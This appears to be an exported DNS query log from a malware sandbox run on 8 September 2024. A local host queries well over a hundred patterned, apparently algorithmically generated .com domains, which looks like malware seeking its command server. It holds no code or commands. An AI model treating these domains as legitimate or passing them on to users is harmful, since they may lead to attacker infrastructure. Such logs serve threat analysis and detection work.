                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436726093 CEST192.168.2.41.1.1.10xc9fcStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.436784983 CEST192.168.2.41.1.1.10x4116Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.437239885 CEST192.168.2.41.1.1.10x4d03Standard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.455853939 CEST192.168.2.41.1.1.10xfef1Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456053019 CEST192.168.2.41.1.1.10xd782Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.456222057 CEST192.168.2.41.1.1.10xddb7Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.459121943 CEST192.168.2.41.1.1.10x1867Standard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462091923 CEST192.168.2.41.1.1.10xb22dStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462443113 CEST192.168.2.41.1.1.10x9e98Standard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.462798119 CEST192.168.2.41.1.1.10x68fdStandard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463213921 CEST192.168.2.41.1.1.10x37c1Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 08:59:59.463685036 CEST192.168.2.41.1.1.10x2341Standard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289261103 CEST192.168.2.41.1.1.10xb25aStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289637089 CEST192.168.2.41.1.1.10x351fStandard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289838076 CEST192.168.2.41.1.1.10xb7deStandard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.289994001 CEST192.168.2.41.1.1.10x24b7Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290208101 CEST192.168.2.41.1.1.10xe516Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290237904 CEST192.168.2.41.1.1.10x2e4fStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290419102 CEST192.168.2.41.1.1.10x38dcStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290524960 CEST192.168.2.41.1.1.10x3854Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.290808916 CEST192.168.2.41.1.1.10xe8bcStandard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291017056 CEST192.168.2.41.1.1.10x9938Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291254997 CEST192.168.2.41.1.1.10x93bfStandard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291454077 CEST192.168.2.41.1.1.10x9d42Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.291634083 CEST192.168.2.41.1.1.10x68f5Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292186022 CEST192.168.2.41.1.1.10xcd22Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292341948 CEST192.168.2.41.1.1.10xefe4Standard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292732954 CEST192.168.2.41.1.1.10xd8dfStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292732954 CEST192.168.2.41.1.1.10xae67Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.292829990 CEST192.168.2.41.1.1.10x24ffStandard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293030024 CEST192.168.2.41.1.1.10x930eStandard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293198109 CEST192.168.2.41.1.1.10x5d51Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293353081 CEST192.168.2.41.1.1.10x37faStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.293973923 CEST192.168.2.41.1.1.10x7f9bStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.294289112 CEST192.168.2.41.1.1.10x8a1eStandard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.294509888 CEST192.168.2.41.1.1.10x74b2Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.295867920 CEST192.168.2.41.1.1.10xe448Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296062946 CEST192.168.2.41.1.1.10xa18cStandard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296401978 CEST192.168.2.41.1.1.10xe982Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296578884 CEST192.168.2.41.1.1.10x4e92Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296753883 CEST192.168.2.41.1.1.10x942Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.296969891 CEST192.168.2.41.1.1.10xaaa5Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.297125101 CEST192.168.2.41.1.1.10xae97Standard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.297286034 CEST192.168.2.41.1.1.10xad1fStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300158978 CEST192.168.2.41.1.1.10xa86Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.300395966 CEST192.168.2.41.1.1.10x5005Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.581588984 CEST192.168.2.41.1.1.10x2931Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.586479902 CEST192.168.2.41.1.1.10xc0fbStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.587265968 CEST192.168.2.41.1.1.10x8c71Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.589863062 CEST192.168.2.41.1.1.10x5b38Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.590621948 CEST192.168.2.41.1.1.10x3e2cStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.593396902 CEST192.168.2.41.1.1.10x89bcStandard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.595648050 CEST192.168.2.41.1.1.10xef8fStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.595880032 CEST192.168.2.41.1.1.10x6d12Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.596015930 CEST192.168.2.41.1.1.10x4a80Standard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.596293926 CEST192.168.2.41.1.1.10x3094Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.596812963 CEST192.168.2.41.1.1.10x1835Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.597510099 CEST192.168.2.41.1.1.10x7df0Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.597882032 CEST192.168.2.41.1.1.10xb375Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.598054886 CEST192.168.2.41.1.1.10x3486Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.598674059 CEST192.168.2.41.1.1.10xe98cStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.598990917 CEST192.168.2.41.1.1.10x2f7fStandard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.603414059 CEST192.168.2.41.1.1.10xfcf9Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.603924990 CEST192.168.2.41.1.1.10x30Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.605700016 CEST192.168.2.41.1.1.10x8ba2Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.606934071 CEST192.168.2.41.1.1.10x9c0eStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.619966984 CEST192.168.2.41.1.1.10x65ebStandard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620150089 CEST192.168.2.41.1.1.10xcb8dStandard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620497942 CEST192.168.2.41.1.1.10xb99Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620626926 CEST192.168.2.41.1.1.10xdcb8Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620661974 CEST192.168.2.41.1.1.10xaab5Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.620898008 CEST192.168.2.41.1.1.10x36f1Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.636396885 CEST192.168.2.41.1.1.10xa351Standard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.636893988 CEST192.168.2.41.1.1.10x9fceStandard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.637315035 CEST192.168.2.41.1.1.10xd874Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.637656927 CEST192.168.2.41.1.1.10xab11Standard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.639713049 CEST192.168.2.41.1.1.10x7188Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.641783953 CEST192.168.2.41.1.1.10x2dbeStandard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.643759966 CEST192.168.2.41.1.1.10x14c2Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.643789053 CEST192.168.2.41.1.1.10xf80aStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.651027918 CEST192.168.2.41.1.1.10x3184Standard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.651518106 CEST192.168.2.41.1.1.10xe862Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.651726961 CEST192.168.2.41.1.1.10x7872Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.652055025 CEST192.168.2.41.1.1.10xf893Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.652312040 CEST192.168.2.41.1.1.10xdadStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.652489901 CEST192.168.2.41.1.1.10x691dStandard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.653496027 CEST192.168.2.41.1.1.10x7529Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.655719995 CEST192.168.2.41.1.1.10x37efStandard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.656735897 CEST192.168.2.41.1.1.10x1eb3Standard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.657202959 CEST192.168.2.41.1.1.10xfbb5Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.657948971 CEST192.168.2.41.1.1.10x8dd9Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.658766985 CEST192.168.2.41.1.1.10x9ce5Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.659145117 CEST192.168.2.41.1.1.10xbd4fStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.664844036 CEST192.168.2.41.1.1.10x79d3Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.751363993 CEST192.168.2.41.1.1.10x6b9aStandard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.773802996 CEST192.168.2.41.1.1.10x6b4Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.773988962 CEST192.168.2.41.1.1.10xd156Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:01.774174929 CEST192.168.2.41.1.1.10xffd5Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.318597078 CEST192.168.2.41.1.1.10x109eStandard query (0)vocygim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.375783920 CEST192.168.2.41.1.1.10x38aaStandard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379061937 CEST192.168.2.41.1.1.10xb781Standard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379272938 CEST192.168.2.41.1.1.10x451dStandard query (0)lysylun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379446030 CEST192.168.2.41.1.1.10xa3b4Standard query (0)lyvynid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.379599094 CEST192.168.2.41.1.1.10xb209Standard query (0)puvybuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.390290976 CEST192.168.2.41.1.1.10xb231Standard query (0)pujypal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.390683889 CEST192.168.2.41.1.1.10x8054Standard query (0)gatykyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.400949001 CEST192.168.2.41.1.1.10x3f2Standard query (0)pupylug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.401155949 CEST192.168.2.41.1.1.10xf575Standard query (0)vopykum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.402679920 CEST192.168.2.41.1.1.10xd429Standard query (0)lykyser.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.405971050 CEST192.168.2.41.1.1.10x89b3Standard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.406171083 CEST192.168.2.41.1.1.10xc759Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.406510115 CEST192.168.2.41.1.1.10x372dStandard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.409847975 CEST192.168.2.41.1.1.10xacffStandard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410068035 CEST192.168.2.41.1.1.10xb784Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410422087 CEST192.168.2.41.1.1.10xc3ddStandard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410595894 CEST192.168.2.41.1.1.10x766eStandard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410768032 CEST192.168.2.41.1.1.10xfcf5Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.410918951 CEST192.168.2.41.1.1.10xbba1Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.411075115 CEST192.168.2.41.1.1.10xb1d3Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.411216974 CEST192.168.2.41.1.1.10x47d5Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.411362886 CEST192.168.2.41.1.1.10x8161Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.412552118 CEST192.168.2.41.1.1.10xf4c8Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.485594034 CEST192.168.2.41.1.1.10x98aaStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.488648891 CEST192.168.2.41.1.1.10xf142Standard query (0)lygyxad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.691389084 CEST192.168.2.41.1.1.10xc825Standard query (0)gacyvub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.695019007 CEST192.168.2.41.1.1.10x60c4Standard query (0)lygytix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.696173906 CEST192.168.2.41.1.1.10x67d8Standard query (0)vofyruc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.697750092 CEST192.168.2.41.1.1.10xf86fStandard query (0)qeqyhol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.701677084 CEST192.168.2.41.1.1.10xd547Standard query (0)qexyvyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703326941 CEST192.168.2.41.1.1.10x2b20Standard query (0)pufytip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.703948975 CEST192.168.2.41.1.1.10xa254Standard query (0)gaqyhaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.704687119 CEST192.168.2.41.1.1.10x993dStandard query (0)lyxyvyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705410004 CEST192.168.2.41.1.1.10x5c8fStandard query (0)puzyceg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.705952883 CEST192.168.2.41.1.1.10x8d21Standard query (0)pupywyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.706546068 CEST192.168.2.41.1.1.10x5f63Standard query (0)qetyhov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.707727909 CEST192.168.2.41.1.1.10x7601Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.709768057 CEST192.168.2.41.1.1.10xbbafStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.711961985 CEST192.168.2.41.1.1.10x927Standard query (0)pujytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.714731932 CEST192.168.2.41.1.1.10x74bfStandard query (0)gatyhos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.715356112 CEST192.168.2.41.1.1.10xe758Standard query (0)vopyjac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.716278076 CEST192.168.2.41.1.1.10xc50eStandard query (0)qebyvyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.717758894 CEST192.168.2.41.1.1.10xb792Standard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.719320059 CEST192.168.2.41.1.1.10xf53fStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.720448017 CEST192.168.2.41.1.1.10xcaa6Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.722062111 CEST192.168.2.41.1.1.10xab12Standard query (0)qekytig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.723752022 CEST192.168.2.41.1.1.10xe9daStandard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.725835085 CEST192.168.2.41.1.1.10xa6c7Standard query (0)lysyjex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.727046013 CEST192.168.2.41.1.1.10x60bdStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.729923010 CEST192.168.2.41.1.1.10xaa64Standard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.730540991 CEST192.168.2.41.1.1.10x86d9Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.732429028 CEST192.168.2.41.1.1.10xba82Standard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.733490944 CEST192.168.2.41.1.1.10x8fc3Standard query (0)lymynuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.735172987 CEST192.168.2.41.1.1.10x3055Standard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.736828089 CEST192.168.2.41.1.1.10xbcd4Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.738667011 CEST192.168.2.41.1.1.10x6dc0Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.740394115 CEST192.168.2.41.1.1.10xf01fStandard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.742360115 CEST192.168.2.41.1.1.10x98cdStandard query (0)vofykyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.743976116 CEST192.168.2.41.1.1.10xd2f2Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.745595932 CEST192.168.2.41.1.1.10x3e71Standard query (0)pufylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.747392893 CEST192.168.2.41.1.1.10x9024Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.748961926 CEST192.168.2.41.1.1.10xc19fStandard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.750879049 CEST192.168.2.41.1.1.10x8952Standard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.752198935 CEST192.168.2.41.1.1.10x6b44Standard query (0)purymog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.753921032 CEST192.168.2.41.1.1.10xa201Standard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.754513979 CEST192.168.2.41.1.1.10x60daStandard query (0)qegylul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.757196903 CEST192.168.2.41.1.1.10xa2eStandard query (0)vocydyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.759042978 CEST192.168.2.41.1.1.10x30fStandard query (0)lyryman.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.760776043 CEST192.168.2.41.1.1.10x578eStandard query (0)gahyziw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.761614084 CEST192.168.2.41.1.1.10x3524Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.763737917 CEST192.168.2.41.1.1.10x31d1Standard query (0)qetyqag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.765528917 CEST192.168.2.41.1.1.10x8d4dStandard query (0)vojyzik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.767229080 CEST192.168.2.41.1.1.10x9d2fStandard query (0)lyvyfux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.768727064 CEST192.168.2.41.1.1.10x350aStandard query (0)gatyqeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.771513939 CEST192.168.2.41.1.1.10x4461Standard query (0)pujyxoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.773401022 CEST192.168.2.41.1.1.10x9068Standard query (0)qebyfup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.774806023 CEST192.168.2.41.1.1.10x1eb9Standard query (0)vopyqef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.776549101 CEST192.168.2.41.1.1.10x2653Standard query (0)lykyxoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.777193069 CEST192.168.2.41.1.1.10x6074Standard query (0)ganyfuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.778660059 CEST192.168.2.41.1.1.10x80f7Standard query (0)vowyjak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.780349970 CEST192.168.2.41.1.1.10x7beStandard query (0)qekyxaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Sep 8, 2024 09:00:05.781853914 CEST192.168.2.41.1.1.10xeda3Standard query (0)vonygit.comA (IP address)IN (0x0001)false
